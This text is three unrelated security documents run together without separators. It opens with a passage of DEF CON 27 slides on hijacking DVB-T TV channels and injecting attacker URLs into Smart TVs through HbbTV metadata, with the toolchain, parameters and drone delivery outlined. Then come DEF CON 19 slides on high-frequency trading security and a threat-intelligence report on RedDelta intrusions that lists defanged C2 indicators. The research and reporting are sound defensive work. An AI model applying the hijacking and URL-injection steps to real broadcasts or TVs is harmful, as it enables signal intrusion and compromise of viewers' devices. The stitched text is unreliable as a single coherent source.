MAUT              | LA OTRA            | 746.000.000
MAUT              | BOM                | 746.000.000
RGE1              | La 2 HD            | 770.000.000
RGE1              | La 2               | 770.000.000
RGE1              | La 1 HD            | 770.000.000
RGE1              | La 1               | 770.000.000
RGE1              | Clan               | 770.000.000
RGE1              | 24h                | 770.000.000
MPE2              | nova               | 778.000.000
MPE2              | neox               | 778.000.000
MPE2              | laSexta HD         | 778.000.000
MPE2              | laSexta            | 778.000.000
MPE2              | antena 3 HD        | 778.000.000
MPE2              | antena 3           | 778.000.000
DefCON 27, Pedro Cabrera
[Diagram: multiplex-to-frequency map — MPE5 @ 482, MPE4 @ 514, MPE1 @ 570, TL06M @ 618, RGE2 @ 634, MPE3 @ 698, MAUT @ 746, RGE1 @ 770 and MPE2 @ 778 MHz]
DefCON 27, Pedro Cabrera
[II] Background: TV hijacking attacks
•
East Coast USA 1986. At 12:32, HBO (Home Box Office) received its satellite signal from its
operations center on Long Island in New York interrupted by a man who calls himself "Captain
Midnight". The interruption occurred during a presentation by The Falcon and the Snowman.
•
CHICAGO 1987 WGN (Channel 9) sportscast is hijacked at 9:14 pm on November 22. Someone
wearing a Max Headroom mask and wearing a yellow blazer interrupted a recorded segment of
the "Chicago Bears" for about 25 seconds. At 23:15 the broadcast of an episode of "Dr. Who" on
the WTTW network was interrupted by the same character, this time with strange audio, an
appearance of another person and a longer time in the air.
•
Lebanon war 2006. During the Lebanon War of 2006, Israel overloaded the satellite broadcast of
Al Manar TV of Hezbollah to broadcast anti-Hezbollah propaganda.
https://en.wikipedia.org/wiki/
Broadcast_signal_intrusion
DefCON 27, Pedro Cabrera
[II] Smart TV attacks state of the art
•
June 2014 - Weeping Angel (CIA) - WikiLeaks. It shows exactly what an agent must do to turn a Samsung Smart
TV into a microphone. Attack requires local access to the Smart TV.
•
April 2015 - Yossef Oren and Angelos D. Keromytis "Attacking the Internet using Broadcast Digital Television".
Theoretical study on the potential attacks on the HbbTV System.
•
February 2017 - Rafael Scheel "Hacking a Smart TV". It presents two vulnerabilities to two Samsung Smart TV web
browsers: Flash and Javascript, which it exploits by creating its own HbbTV application, broadcasting it through its
own DVB-T channel. For this, it uses a low-cost proprietary device and an unpublished SW. In no case does it use
SDR or OpenSource tools.
DefCON 27, Pedro Cabrera
[II] DVB-T Channel Hijacking
Channel injection
URL injection
DefCON 27, Pedro Cabrera
Using the same frequency and channel metadata as in the original channel, we will transmit our video file using
BladeRF, HackRF or any capable SDR supported by GNURadio:
gr-dtv
(gr-dvbt)
Video file
HbbTV
Channel
metada
[II] DVB-T Channel Hijacking
DefCON 27, Pedro Cabrera
We must generate a "Transport Stream" (TS file) with the same parameters of the legitimate channel and the new A/V
content:
Transport
stream file
Video file
ffmpeg
original_network_id = XXXX
transport_stream_id = YY
service_id = [ZZZ]
pmt_pid = [VV]
[II] DVB-T Channel Hijacking
DefCON 27, Pedro Cabrera
We must generate a "Transport Stream" (TS file) with the same parameters of the legitimate channel and the new A/V
content:
Transport
stream file
Video file
HbbTV
Metadata
(hbbtv-dvbstream)
1. ffmpeg
2. OpenCaster
original_network_id = XXXX
transport_stream_id = YY
service_id = [ZZZ]
pmt_pid = [VV]
Video TS
Audio TS
[II] DVB-T Channel Hijacking
DefCON 27, Pedro Cabrera
[II] DVB-T Channel Parameters
DefCON 27, Pedro Cabrera
[II] DVB-T Channel Parameters
Linux command line:
dvbv5-scan (DVBv5 Tools)
DefCON 27, Pedro Cabrera
[II] DVB-T Channel Hijacking
DefCON 27, Pedro Cabrera
[III] TV antenna facility attack
We can eliminate the radio phase by injecting our signal into the antenna facility, replacing the main TV stream from the
antenna with our stream.
Amplifier
Splitter
DefCON 27, Pedro Cabrera
TV antenna
facility
TV splitters (1/3)
[III] TV antenna facility attack
DefCON 27, Pedro Cabrera
TV antenna
facility
TV splitters (1/4)
[III] TV antenna facility attack (II)
TV Amplifier
DefCON 27, Pedro Cabrera
[III] TV antenna facility attack
DefCON 27, Pedro Cabrera
[III] Why miniaturization ?
https://www.uavsystemsinternational.com/how-much-weight-can-a-drone-lift/
DefCON 27, Pedro Cabrera
[III] Miniaturization – Drone attacks
GPD
480gr
BladeRF
170gr
HackRF
100gr
Bateria iPhone 10.000mA 280gr
Bateria Solar 24.000mA
350gr
Bateria NeoXeo 6.000mA 100gr
Odroid C2
68gr
Carcasa Odroid
32gr
300 gr
DefCON 27, Pedro Cabrera
[III] Drone attack
DefCON 27, Pedro Cabrera
[III] DVB-T Channel Hijacking: Impact
Generic TV Network
DefCON 27, Pedro Cabrera
[III] DVB-T Channel Hijacking: Impact
DefCON 27, Pedro Cabrera
[IV] URL Injection attack
The HbbTV standard allows Smart TVs to send GET requests to the URL transmitted by the channel (station) every so
often:
URL
DefCON 27, Pedro Cabrera
[IV] URL Injection attack
DefCON 27, Pedro Cabrera
[IV] URL Injection attack: Basic
We add the URL of our fake server in the HbbTV metadata: application name, base URL, web page,
organizationId and applicationId
gr-dtv
(gr-dvbt)
Video file
HbbTV
Channel
Metada (URL)
DefCON 27, Pedro Cabrera
[IV] URL Injection attack: Video Replay
gr-dtv
(gr-dvbt)
Channel video
& audio
HbbTV
Channel
Metada (URL)
DVBv5 Tools
dvbsnoop
DefCON 27, Pedro Cabrera
We must generate a "Transport Stream" (TS file) with the same parameters of the legitimate channel and the new
Application/URL content:
Video file
Transport
stream file
[IV] URL injection attack
HbbTV
Metadata
(hbbtv-dvbstream)
1. ffmpeg
2. OpenCaster
appli_name = [“DefCON27"]
appli_root = ["http://10.0.0.1/"]
appli_path = ["index1.htm"]
Video TS
Audio TS
DefCON 27, Pedro Cabrera
User
Browser
HbbTV
Browser
[IV] One SmartTV, two browsers
SDR URL injection attack
ARP Poison/DNS Hijacking URL injection attack
[ ]
· HbbTV Browser
(remote)
· HbbTV & User
Browsers
(requires WLAN
access)
HbbTV
Browser
DefCON 27, Pedro Cabrera
[IV] One SmartTV, two browsers
Samsung TV:
HbbTV/1.2.1 (+DRM+TVPLUS;Samsung;SmartTV2017;T-KTMDEUC-1106.2;;)
Mozilla/5.0 (SMART-TV; Linux; Tizen 3.0) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.0
Chrome/47.0.2526.69 TV safari/537.36
Panasonic TV:
HbbTV/1.2.1 (;Panasonic;VIERA 2014;3.101;6101-0003 0010-0000;)
Mozilla/5.0 (X11; FreeBSD; U; Viera; es-ES) AppleWebKit/537.11 (KHTML, like Gecko) Viera/3.10.14
Chrome/23.0.1271.97 Safari/537.11
DefCON 27, Pedro Cabrera
[IV] Smart (TV) scanning
Apache Log files:
• Public IP address
• Models/Manufacturers (UA)
• DVB-T Channels/Audience analysis
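A minimal sketch of that log analysis, assuming Apache's default combined log format and log path (both assumptions):

from collections import Counter

LOG = "/var/log/apache2/access.log"   # assumed default path

ips, makers = set(), Counter()
with open(LOG) as f:
    for line in f:
        line = line.rstrip()
        if not line.endswith('"'):
            continue                        # not a combined-format line
        ip = line.split(" ", 1)[0]
        ua = line.rsplit('"', 2)[1]         # last quoted field = User-Agent
        if "HbbTV" in ua and ";" in ua:
            ips.add(ip)                     # public IP addresses
            makers[ua.split(";")[1]] += 1   # manufacturer field of HbbTV UA

print(len(ips), "distinct Smart TVs seen")
for maker, hits in makers.most_common():
    print(maker, hits)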
[IV] Video replay & URL injection attack
dvbv5-zap
gr-dvbt
dvbsnoop
tscbrmuxer
[IV] Social engineering (SE) attacks
[IV] Keylogger attack
[IV] Crypto Mining
https://www.coindesk.com/hackers-infect-50000-servers-with-sophisticated-crypto-mining-malware
https://medium.com/tebs-lab/cryptojacking-hackers-just-want-to-borrow-your-cpu-ebf769c28537
https://www.tripwire.com/state-of-security/latest-security-news/4k-websites-infected-with-crypto-miner-after-tech-provider-hacked/
https://www.express.co.uk/finance/city/911278/cryptocurrency-hacking-bitcoin-ripple-ethereum-mining-youtube-adverts
[IV] Crypto Mining attack
[IV] Hooking user browser
[IV] User browser attack
[V] Conclusions
https://www.eff.org/files/2019/07/09/whitepaper_imsicatchers_eff_0.pdf
https://maritime-executive.com/editorials/mass-gps-spoofing-attack-in-black-sea
[V] Conclusions
https://www.choice.com.au/electronics-and-technology/home-entertainment/tvs-and-projectors/buying-guides/tvs
https://voicebot.ai/2018/07/19/smart-tv-market-share-to-rise-to-70-in-2018-driven-by-streaming-services-alexa-and-google-assistant/
Thank You
2019 August, DefCON 27
Gonzalo Manera
Pepe Cámara
Alvaro Castellanos
Luis Bernal (aka n0p)
github.com/pcabreracamara/DC27
security when
nanoseconds count
James Arlen, CISA
DEF CON 19
disclaimer
I am employed in the Infosec industry,
but not authorized to speak on behalf
of my employer or clients.
Everything I say can be blamed on
the voices in your head.
credentials
• 15+ years information security specialist
• staff operations, consultant, auditor, researcher
• utilities vertical (grid operations, generation, distribution)
• financial vertical (banks, trust companies, trading)
• some hacker related stuff (founder of think|haus)
...still not an expert at anything.
nanoseconds...
Admiral Hopper says...
From an interview segment by Morley Safer in 1982
$=c (speed of light matters)
• distance light travels in a:
• millisecond ~300km (~186 miles)
• microsecond ~300m (~328 yards)
• nanosecond ~30cm (~1 foot)
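Those approximations fall straight out of distance = c × t:

c = 299_792_458  # speed of light in vacuum, m/s

for name, t in (("millisecond", 1e-3), ("microsecond", 1e-6), ("nanosecond", 1e-9)):
    print(f"1 {name}: light travels ~{c * t:,.3f} m")
# In fiber or copper, signals propagate at roughly 2/3 of c,
# so practical distances are shorter still.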
before you ask...
• This is a talk about... $$
• I’m not going to mention any of those things on your buzz-word bingo card:
  • SCADA
  • APT
  • PCI - DSS
  • wikileaks
  • (anti-|lulz)sec
  • hacktivism
  • ...insert more here.
finance at DEF CON?
• You know it!
• DEF CON is all about offensive and defensive
techniques and technologies
• Sometimes, knowing that a vulnerability exists
to be exploited helps to focus attention.
• Sometimes, people like me tell you things that
sound completely crazy but have a history of
coming true.
trading history
• 1200s - Commodity and Debt trading
• 1500s - Inter-market trading
• 1600s - Equity trading
• early 1800s - Reuters uses carrier pigeons
• late 1800s - electronic ticker tape (market data feeds) become widespread
• mid 1900s - quotation systems (next price rather than last price) become widespread
• late 1900s - computers are used to maintain the records of the exchange
• early 2000s - computers begin trading with each other without human intervention
definitions
• high speed trading: committing trades on a
scale faster than human interactive speeds
• algorithmic trading: trades based on the
mathematical result of incoming
information from external sources (news,
market data, etc.)
arbitrage
• the practice of taking advantage of a price difference
between two or more markets: striking a combination of
matching deals that capitalize upon the imbalance, the
profit being the difference between the market prices.
• in space - between two geographically separated
markets
• in time - between the moment information is available
and the moment information is widely known
time
• when markets were new (middle of last
millennium) trade times were measured at a
very human scale
• late 1800s brought trade times to minutes
• 1900s brought trade times to seconds
• 2000s bring trade times in 100s of
microseconds
• Future trade times may well involve
tachyon emissions
architecture
how fast is fast?
• seconds: you have no position
• milliseconds: you lose nearly every time
• sub-millisecond: big players regularly beat you
• 100s of microseconds: you’re a bit player and
missing a lot
• 10s of microseconds: you’re usually winning
predictability
• Almost as important as sheer speed is
predictable speed.
• Enemies are: jitter, packet loss, inefficient
protocols (tcp)
• Dropped packet is dropped cash
proximity
• Proximity relieves many of the speed/latency/
jitter effects
• You’re on the LAN, not the MAN or the WAN
latency costs $
• latency has a $$cost associated with it -
measurable and therefore fundable
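A toy model makes the funding argument explicit. Every number below is invented purely for illustration:

opportunities_per_day = 100_000       # hypothetical
profit_per_win = 0.01                 # $ per won race, hypothetical
base_win_rate = 0.60                  # at current latency, hypothetical
win_rate_loss_per_us = 0.02           # hypothetical decay per added microsecond

def daily_pnl(extra_latency_us):
    win_rate = max(0.0, base_win_rate - win_rate_loss_per_us * extra_latency_us)
    return opportunities_per_day * win_rate * profit_per_win

for us in (0, 5, 10, 25):
    print(f"+{us} us latency -> ${daily_pnl(us):,.0f}/day")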
missing?
oh crap.
dude, where’s my firewall?
• no firewalls...
• they add latency (a lot of latency)
• latency costs $
• risk < cost < profit
acl me please?
• no acls
• they add latency
• (most) switches can’t do cut-through switching while ACLs are on
• risk < cost < profit
harden this...
• no (meaningful) system hardening
• reduced system loading (stripped bare)
• largely custom interfacing code
(ethernet / infiniband / PCIe)
• and the usual complaints about
maintainability and problem resolution
Specialized Systems
threat modelling
• we know what’s missing in our usual suite
of controls
• how do we describe it?
• how do we determine what is a reasonable
threat to build protective measures against?
THREAT: vendors
• You’re trusting that the marketing slick is
what you’ll get.
• You’re trusting that they haven’t hired any
bad guys.
MAYBE: vendors
• How about a vendor developer who alters
the patches you receive so that the
Precision Time Protocol (PTPv2 - 802.1AS)
has a different concept of a microsecond
from the one everyone else is using?
http://www.ieee802.org/1/pages/802.1as.html
THREAT: developers
• In most algo-trading, the developer isn’t a
traditional developer with all of the usual
SDLC controls
• The developer is probably a trader or a
trader underling who has live access to the
production algo engine and can make on-
the-fly changes
YES: Developers
• Sergey Aleynikov
July 3, 2009
http://www.wired.com/threatlevel/2009/07/aleynikov/
• 32 MEGABYTES of code
from Goldman Sachs
• sentenced to 97 months
in prison (8 years 1
month) and $12,500 fine
http://www.facebook.com/group.php?gid=123550517320
THREAT: the insider
• not *that* kind of insider
• how do you deal with a trader (or
administrator) who is utilizing access to
market data networks or exchange
networks to cause negative effects on
other participants?
YES: Traders
• Samarth Agrawal
April 16, 2010
http://www.wired.com/threatlevel/2010/04/
bankerarrested/
• several hundred pages
of code from Societe
Generale
• sentenced to 3 years
in prison + 2 years
supervised release +
deportation
THREAT: the market
• This is an odd kind of technical threat
• Can the market itself cause issues with
your systems?
• malformed messages
• transaction risk scrutiny
• compromised systems
YES: Market
• 2010-05-06 - DJIA drops 900 points in
minutes -- THE FLASH CRASH
• Report from Nanex
http://www.nanex.net/20100506/FlashCrashAnalysis_Part1-1.html
Ed Felten’s Summary
1. Some market participants sent a large number of quote requests to the New York Stock Exchange (NYSE) computers.
2. The NYSE normally puts outgoing price quotes into a queue before they are sent out. Because of the high rate of requests, this queue backed up, so that some quotes took a (relatively) long time to be sent out.
3. A quote lists a price and a time. The NYSE determined the price at the time the quote was put into the queue, and timestamped each quote at the time it left the queue. When the queues backed up, these quotes would be "stale", in the sense that they had an old, no-longer-accurate price --- but their timestamps made them look like up-to-date quotes.
4. These anomalous quotes confused other market participants, who falsely concluded that a stock's price on the NYSE differed from its price on other exchanges. This misinformation destabilized the market.
5. The faster a stock's price changed, the more out-of-kilter the NYSE quotes would be. So instability bred more instability, and the market dropped precipitously.
https://freedom-to-tinker.com/blog/felten/stock-market-flash-crash-attack-bug-or-gamesmanship
questioning trust
• is it even possible to trust within this
framework?
• how to ensure that you monitor the
threats?
traditional security fails
• 100,000 times too slow
• unwilling to learn that this is a
fundamentally different world
• still focused on checkbox compliance
answer the hard one - later
• how to secure custom everything?
• how to be fast enough
• how to make the case that security efforts
reduce risk and preclude disaster
do something!
• I’m not talking about hard stuff like code
review, custom application level firewalls,
mysterious FPGA stuff...
• Party like it’s 1999 --
NETWORK SECURITY BASICS
• even a little bit of Layer 4 goodness would help
ITSecurity:TNG
• where’s the next next generation...
• juniper and cisco are a start...
• weird severely custom stuff is a start...
• why aren’t we keeping up?
Well, thanks.
What now?
DO ANYTHING
• at this point - step up - do anything
• it sounds so terrible to say that but even
developing an architectural understanding is
better than nothing
• make friends and influence people
DO ANYTHING
• you’re on the record as saying that you’d
choose performance over security...
http://www.darkreading.com/vulnerability-management/167901026/security/perimeter-security/231002280/most-it-security-pros-disabling-security-functions-in-favor-of-network-speed.html (July 21, 2011)
product vendors...
• time to challenge your vendors
• you want more than checkboxes
• there are other markets besides
credit card compliance
• there is money to spend on whatever
exotic thing you want to develop
product vendors...
• Some product vendors are getting this.
• Most aren’t.
• Because we’re “not asking for it”!?!
risk / process / policy / grc
• work with your business folks
• they understand risk - probably better than you do
• they have a different tolerance for risk
• understand how to use their knowledge to help
you make good decisions
• do not blindly follow dogmatic statements
risk / process / policy / grc
• You’re not going to be able to change their
minds about the cost of latency.
• You can work with them to change your
understanding of how to do things.
• Just because you did it that way last year
doesn’t mean that’s still the best option.
compliance
• IT compliance people, meet the financial
compliance people - you have things to talk
about.
compliance
• The SEC is taking an active interest
• July 26, 2011 announcement of the Large Trader Reporting Rule (13h-1): http://sec.gov/news/press/2011/2011-154.htm
• There is more to come - other regulators are watching.
in the trenches
ORIGINAL RESEARCH
in the trenches
• understand your business partners’ needs
• look for solutions
• build PoC rigs to test
in the trenches
• encourage vendors to get with it
• spend time looking at the truly weird stuff
• be prepared for the continued downward
pressure on transaction times
Don’t Panic
Q & A
twitter: @myrcurial
[email protected]
Credits, Links and Notices
Thanks:
All of you,
The Dark Tangent & the DEF CON team,
My Friends, My Family
Colophon:
twitter, wikipedia, fast music, caffeine, my lovely wife and hackerish
children, blinky lights, shiny things, angst, modafinil & altruism.
Me:
http://myrcurial.com http://doinginfosecright.com
http://securosis.com http://liquidmatrix.org
Credits:
Chicago Board of Trade Image: Daniel Schwen
IBM Mainframe Image: ChineseJetPilot
New York Stock Exchange Image: Randy Le’Moine Photography
Toronto Stock Exchange Image: Jenny Lee Silver
http://creativecommons.org/licenses/by-nc-sa/2.5/ca/
CHINESE STATE-SPONSORED GROUP ‘REDDELTA’ TARGETS THE VATICAN AND CATHOLIC ORGANIZATIONS
CTA-CN-2020-0728
By Insikt Group
CYBER THREAT ANALYSIS | CHINA
Insikt Group® researchers used proprietary Recorded Future Network Traffic
Analysis and RAT controller detections, along with common analytical techniques, to
identify and profile a cyberespionage campaign attributed to a suspected Chinese
state-sponsored threat activity group, which we are tracking as RedDelta.
Data sources include the Recorded Future® Platform, Farsight Security’s
DNSDB, SecurityTrails, VirusTotal, Shodan, BinaryEdge, and common OSINT
techniques.
This report will be of greatest interest to network defenders of private sector,
public sector, and non-governmental organizations with a presence in Asia, as well
as those interested in Chinese geopolitics.
Executive Summary
From early May 2020, the Vatican and the Catholic Diocese of Hong Kong were among several Catholic Church-related organizations
that were targeted by RedDelta, a Chinese-state sponsored threat
activity group tracked by Insikt Group. This series of suspected network
intrusions also targeted the Hong Kong Study Mission to China and the
Pontifical Institute for Foreign Missions (PIME), Italy. These organizations
have not been publicly reported as targets of Chinese threat activity
groups prior to this campaign.
These network intrusions occured ahead of the anticipated
September 2020 renewal of the landmark 2018 China-Vatican provisional
agreement, a deal which reportedly resulted in the Chinese Communist
Party (CCP) gaining more control and oversight over the country’s
historically persecuted “underground” Catholic community. In addition
to the Holy See itself, another likely target of the campaign includes
the current head of the Hong Kong Study Mission to China, whose
predecessor was considered to have played a vital role in the 2018
agreement.
The suspected intrusion into the Vatican would offer RedDelta
insight into the negotiating position of the Holy See ahead of the deal’s
September 2020 renewal. The targeting of the Hong Kong Study Mission
and its Catholic Diocese could also provide a valuable intelligence source
for both monitoring the diocese’s relations with the Vatican and its
position on Hong Kong’s pro-democracy movement amidst widespread
protests and the recent sweeping Hong Kong national security law.
While there is considerable overlap between the observed TTPs of
RedDelta and the threat activity group publicly referred to as Mustang
Panda (also known as BRONZE PRESIDENT and HoneyMyte), there are
a few notable distinctions which lead us to designate this activity as
RedDelta:
The version of PlugX used by RedDelta in this campaign uses
a different C2 traffic encryption method and has a different
configuration encryption mechanism than traditional PlugX.
The malware infection chain employed in this campaign has not been
publicly reported as used by Mustang Panda.
In addition to the targeting of entities related to the Catholic Church,
Insikt Group also identified RedDelta targeting law enforcement and
government entities in India and a government organization in Indonesia.
Key Judgments
The targeting of entities related to the Catholic church is likely
indicative of CCP objectives in consolidating control over the
“underground” Catholic church, “sinicizing religions” in China, and
diminishing the perceived influence of the Vatican within China’s
Catholic community.
Due to RedDelta’s targeting of organizations that heavily align to
Chinese strategic interests, use of shared tooling traditionally used
by China-based groups, and overlaps with a suspected Chinese
state-sponsored threat activity group, Insikt Group believes that
the group likely operates on behalf of the People’s Republic of
China (PRC) government.
The identified RedDelta intrusions feature infrastructure, tooling,
and victimology overlap with the threat activity group publicly
reported as Mustang Panda (also known as BRONZE PRESIDENT
and HoneyMyte). This includes the use of overlapping network
infrastructure and similar victimology previously attributed to this
group in public reporting, as well as using malware typically used
by Mustang Panda, such as PlugX, Poison Ivy, and Cobalt Strike.
Figure 1: Selection of main differences between PlugX variants and the infection chain
used by RedDelta and Mustang Panda.
Threat Analysis
Overview of Catholic Church Intrusions
Using Recorded Future RAT controller detections and network traffic analysis
techniques, Insikt Group identified multiple PlugX C2 servers communicating with
Vatican hosts from mid-May until at least July 21, 2020. Concurrently, we identified
Poison Ivy and Cobalt Strike Beacon C2 infrastructure also communicating with
Vatican hosts, a Vatican-themed phishing lure delivering PlugX, and the targeting
of other entities associated with the Catholic Church.
The lure document shown above, which has been previously reported on in
relation to links to Hong Kong Catholic Church targeting, was used to deliver a
customized PlugX payload that communicated with the C2 domain systeminfor[.]com. The document purported to be an official Vatican letter addressed to the
current head of the Hong Kong Study Mission to China. It is currently unclear
whether the actors created the document themselves, or whether it is a legitimate
document they were able to obtain and weaponize. Given that the letter was
directly addressed to this individual, it is likely that he was the target of a
spearphishing attempt. Additionally, as this sample was compiled after signs of
an intrusion within the Vatican network, it is also possible that the phishing lure
was sent through a compromised Vatican account. This hypothesis is supported by
the identification of communications between PlugX C2s and a Vatican mail server
in the days surrounding the sample’s compilation date and its first submission to
public malware repositories.
Background
China and the Catholic Church
For many years, Chinese state-sponsored groups have targeted religious
minorities within the PRC, particularly those within the so-called “Five Poisons,” such as Tibetan, Falun Gong, and Uighur Muslim communities. Insikt
Group has publicly reported on aspects of this activity, such as our findings on
RedAlpha, the ext4 backdoor, and Scanbox watering hole campaigns targeting the
Central Tibetan Administration, other Tibetan entities, and the Turkistan Islamic
Party. Most recently, a July 2020 U.S. indictment identified the targeting of emails
belonging to Chinese Christian religious figures — a Xi’an-based pastor, as well as
an underground church pastor in Chengdu, the latter of whom was later arrested
by the PRC government, by two contractors allegedly operating on behalf of the
Chinese Ministry of State Security (MSS). Regional branches of China’s Ministry
of Public Security (MPS) have also been heavily involved in digital surveillance of
ethnic and religious minorities within the PRC, most notably by the Xinjiang Public
Security Bureau (XPSB) in the case of Uighur muslims.
Historically, the PRC has had a highly turbulent relationship with the Vatican
and its governing body, the Holy See. In particular, the Holy See’s recognition
of bishops within China’s historically persecuted “underground” Catholic church
traditionally loyal to the Vatican and its relationship with Taiwan has maintained
an absence of official relations since the 1950s. The CCP perceived this behavior
as the Holy See interfering in religious matters within China. In September 2018,
the PRC and the Holy See reached a landmark two-year provisional agreement,
marking a significant step towards renewed diplomatic relations.
Under the provisional agreement, China would regain more control over
underground churches, and the Vatican in turn would gain increased influence
over the appointment of bishops within the state-backed “official” Catholic church.
The deal was met with a mixed reaction, with critics arguing that the deal was
a betrayal of the underground church and would lead to increased persecution
of its members. Many of the harshest criticisms came from clergy within Hong
Kong. A year after the agreement, numerous reports noted the Vatican’s silence in
response to the Hong Kong protests beginning in late 2019, in what critics called
an effort to avoid offending Beijing and jeopardizing the 2018 agreement.
Figure 2: Intelligence Card for RedDelta PlugX C2 Server 167.88.180[.]5.
Figure 3: Vatican lure document targeting the head of Hong Kong study mission to China.
The head of the Hong Kong Study Mission is considered the Pope’s de facto
representative to China and a key link between Beijing and the Vatican. The
predecessor to this role played a key part in the finalization of the 2018 provisional
China-Vatican agreement, making his successor a valuable target for intelligence
gathering ahead of the deal’s expiry and likely renewal in September 2020.
Further entities associated with the Catholic Church were also targeted by
RedDelta in June and July 2020 using PlugX, including the mail servers of an
international missionary center based in Italy and the Catholic Diocese of Hong
Kong.
Insikt Group identified two additional phishing lures loading the same
customized PlugX variant, which both communicated with the same C2
infrastructure as the Vatican lure. The first sample included a lure document
spoofing a news bulletin from the Union of Catholic Asian News regarding the
impending introduction of the new Hong Kong national security law. The content
of the lure file, titled “About China’s plan for Hong Kong security law.doc,” was
taken from a legitimate Union of Catholic Asian News article. The other sample also
references the Vatican using a document titled “QUM, IL VATICANO DELL’ISLAM.doc” for the decoy document. This particular decoy document translates as “Qum,
the Vatican of Islam,” referring to the Iranian city of Qum (Qom), an important
Shi’ite political and religious center. It is taken from the writings of Franco Ometto,
a Italian Catholic academic living in Iran. Although the direct target of these two
lures are unclear, both relate to the Catholic church.
We believe that this targeting is indicative of both China’s objective in
consolidating increased control over the underground Catholic Church within
China, and diminishing the perceived influence of the Vatican on Chinese Catholics.
Similarly, a focus on Hong Kong Catholics amid pro-democracy protests and the
recent sweeping national security law is in line with Chinese strategic interests,
particularly given the Anti-Beijing stance of many of its members, including former
Hong Kong Bishop Cardinal Joseph Zen Ze-kiun.
Other Targeted Organizations
Insikt Group identified several additional suspected victims communicating
with RedDelta C2 infrastructure. While metadata alone does not confirm a
compromise, the high volume and repeated communications from hosts within
targeted organizations to these C2s are sufficient to indicate a suspected
intrusion. A full list of identified targeted organizations are summarized below:
Figure 4: Union of Catholic Asian News article lure document (left), and Qum, the Vatican of Islam
lure document (right).
The organizations targeted by RedDelta in this campaign largely align
with historical activity publicly reported on the threat activity group Mustang
Panda, with the group previously linked to intrusion attempts targeting the Police
of the Sindh Province in Pakistan, law enforcement organizations in India, and
the targeting of entities within Myanmar, Hong Kong, and Ethiopia. The group is
also suspected to have previously targeted China Center (China Zentrum e.V),
a non-profit organization whose members includes Catholic aid organizations,
religious orders and dioceses in Germany, Austria, Switzerland, and Italy, and other
organizations associated with religious and minority groups.
Infrastructure Analysis
In this campaign, RedDelta favored three primary IP hosting providers, and
used multiple C2 servers within the same /24 CIDR ranges across intrusions.
Preferred hosting providers included 2EZ Network Inc (Canada), Hong Kong
Wen Jing Network Limited, and Hong Kong Ai Jia Su Network Limited. The group
consistently registered domains through GoDaddy, with WHOIS data providing
additional linkages between domains used by the threat activity group. Insikt
Group identified two primary clusters of RedDelta infrastructure used throughout
this campaign, referred to as the “PlugX cluster” and the “Poison Ivy and Cobalt
Strike cluster.” A Maltego chart is included below displaying these clusters.
Targeted Organization | Sector | Country/Region of Operation | Date of Observed Activity | RedDelta C2 IP(s)
The Vatican/Holy See | Religious | The Vatican | May 21–July 21, 2020 | 85.209.43[.]21, 103.85.24[.]136, 103.85.24[.]149, 103.85.24[.]190, 154.213.21[.]70, 154.213.21[.]73, 154.213.21[.]207, 167.88.180[.]5, 167.88.180[.]32
Catholic Diocese of Hong Kong | Religious | Hong Kong | May 12–July 21, 2020 | 103.85.24[.]136, 167.88.180[.]5, 167.88.180[.]32
Pontifical Institute for Foreign Missions (PIME), Milan | Religious | Italy | June 2–26, 2020 | 85.209.43[.]21
Sardar Vallabhbhai Patel National Police Academy | Law Enforcement | India | February 16–June 25, 2020 | 103.85.24[.]136, 167.88.180[.]5
Ministry of Home Affairs (Kementerian Dalam Negeri Republik Indonesia) | Government | Indonesia | May 21–July 21, 2020 | 85.209.43[.]21
Airports Authority of India | Government | India | June 18–July 21, 2020 | 154.213.21[.]207
Other Unidentified Victims | N/A | Myanmar, Hong Kong, Ethiopia, Australia | May–July 2020 | 85.209.43[.]21, 103.85.24[.]136, 167.88.180[.]5
Table 1: List of organizations targeted by RedDelta.
‘Ma Ge Bei Luo Xiang Gang Jiu Dian’ and the PlugX Cluster
Vatican hosts and several other victim organizations were communicating
with the PlugX C2 167.88.180[.]5 from May until June 10, 2020. This IP hosted the
domain cabsecnow[.]com over this time period. Cabsecnow[.]com then resolved to
a new IP, 103.85.24[.]136, from June 10 onwards. The suspicious network activity
continued after the C2 IP was updated, increasing our confidence in the likelihood
of intrusion at the targeted organizations.
The cabsecnow[.]com domain shares a similar naming convention to a publicly
reported domain linked to Mustang Panda, cab-sec[.]com. WHOIS data revealed
that both domains were registered several seconds apart through GoDaddy on
September 17, 2019, with the same registrant organization listed: “Ma Ge Bei Luo
Xiang Gang Jiu Dian.” This registrant organization is associated with eight domains
in total, five of which have previously been publicly linked to Mustang Panda
activity by Anomali and Dell SecureWorks. “Ma Ge Bei Luo Xiang Gang Jiu Dian”
translates from Mandarin to Marco Polo Hotel Hong Kong, a legitimate Hong Kong
hotel, although it is unclear why the actor chose this organization when registering
these domains.
Another PlugX C2, 85.209.43[.]21, was also identified communicating with
several hosts within the same targeted organizations (see Table 1). This IP has
hosted ipsoftwarelabs[.]com since November 2019, a domain previously identified
as a Mustang Panda PlugX C2.
Finally, the C2 domain associated with the Vatican and Union of Catholic
Asian News lures, systeminfor[.]com, was hosted on 167.88.180[.]32 since June
2020. This IP has also hosted lameers[.]com since February 2020, another PlugX
C2 identified in activity targeting Hong Kong.
Cobalt Strike/Poison Ivy Cluster
Associated Domain | C2 IP Address | Malware Variant
web.miscrosaft[.]com | 154.213.21[.]207 | Poison Ivy
lib.jsquerys[.]net | 154.213.21[.]70 | Cobalt Strike
lib.hostareas[.]com | 154.213.21[.]73 | Unknown
Table 3: Cobalt Strike/Poison Ivy cluster domains.
The second cluster featured Cobalt Strike and Poison Ivy malware C2 infrastructure. A Poison Ivy sample (SHA256: 9bac74c592a36ee249d6e0b086bfab395a37537ec87c2095f999c00b946ae81d) submitted to
a public malware repository from Italy in early June 2020, several days after the
first evidence of activity between Vatican hosts and this C2, was configured to
communicate with a spoofed Microsoft domain, web.miscrosaft[.]com, hosted
on 154.213.21[.]207. Suspicious network traffic between this Poison Ivy C2 and
several Vatican hosts, as well as an Indian aviation entity, were observed by Insikt
Group analysts.
Two other IP addresses within the same 24-bit CIDR range, 154.213.21[.]73
and 154.213.21[.]70, were also identified communicating with overlapping
Vatican infrastructure at this time. A Cobalt Strike sample (SHA256:
7824eb5f173c43574593bd3afab41a60e0e2ffae80201a9b884721b451e6d935),
uploaded from an Italian IP address to a malware multiscanner repository as a
zipped file the same day as the Poison Ivy sample, also used the 154.213.21[.]70
IP for command and control.
Figure 5: Maltego chart of RedDelta infrastructure.
Domain | Registration Timestamp
sbicabsec[.]com | November 26, 2019 10:31:18Z
systeminfor[.]com | November 19, 2019 07:06:03Z
